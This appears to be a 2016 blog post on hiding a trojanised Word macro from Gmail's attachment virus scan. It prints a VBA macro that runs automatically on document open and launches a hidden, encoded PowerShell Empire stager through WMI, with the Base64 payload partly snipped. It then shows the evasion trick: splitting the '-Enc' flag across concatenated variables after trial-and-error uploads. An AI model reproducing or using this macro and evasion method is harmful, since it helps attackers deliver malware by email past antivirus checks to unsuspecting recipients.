Bypassing Gmail Attachment Virus Check
Bypass Gmail's Attachment Virus Check for PowerShell Macros
Note: This was posted in January 2016
So today whilst doing some practice on creating trojanised Microsoft Word documents, I came across an issue. Gmail by default has a virus check on attachments if you want to send a malicious attachment out.
To insert a payload into the word document, I firstly created a template which looked like the below.
After doing so, creating the macro using AutoOpen and Document_Open was trivial. I made use of a powershell one liner payload along with process creation to launch powershell using an encrypted Payload. Using Powershell Empire’s default copy and paste macro stager, this is detected.
Sample payload:
1
*Sub AutoOpen()
2
Debugging
3
End Sub*
4
*Sub Document_Open()
5
Debugging
6
End Sub*
7
*Public Function Debugging() As Variant
8
Dim Str As String
9
str = “powershell.exe -NoP -NonI -W Hidden -Enc JAB3AGMAP”
10
str = str + “QBOAGUAVwAtAE8AYgBKAGUAQwB0ACAAUwB5AFMAVABlAE0ALgB”*
11
*<snip to save space and sensitivity>*
12
*str = str + “ATwBJAG4AJwAnACkA”
13
Const HIDDEN_WINDOW = 0
14
strComputer = “.”
15
Set objWMIService = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2″)
16
Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)
17
Set objConfig = objStartup.SpawnInstance_
18
objConfig.ShowWindow = HIDDEN_WINDOW
19
Set objProcess = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2:Win32_Process”)
20
objProcess.Create str, Null, objConfig, intProcessID
21
End Function*
Copied!
What I did was begin removing lines of code and kept uploading repeatedly to Gmail attachments until it would no longer detect it as a virus.
I made adjustments to the payload trying to identify which string or pattern the AV was picking up. I quickly realised that it was the fact that the “-Enc” was part of the payload.
To resolve this, I split the “-Enc” string into “-E” and “nc” then concatenated it together. For example:
1
*Dim Yops As String*
2
*Yops = “powershell.exe -Enc PAYLOADHERE”*
Copied!
This would be translated to the following:
1
*Dim Yops As String*
2
*Yops = “powershell.exe -E”*
3
*Yops = Yops + “nc PAYLOADHERE”*
Copied!
However, this technique did not work. My next approach to thinking about it was that the “Yops” string is checked at the end after all the concatenation to determine whether “-Enc” is followed by “powershell.exe”. Therefore what I did was the following and it bypassed the virus checks.
1
*Dim Yops As String*
2
*Yops = “powershell.exe -E”*
3
*Yolo = “nc PAYLOAD”*
4
*Yops = Yops + Yolo + “HERE”*
Copied!
This quickly bypassed the antivirus feature on Gmail’s attachments and I was able to send the payload to my other machine for testing.
Last modified 2yr ago
Copy link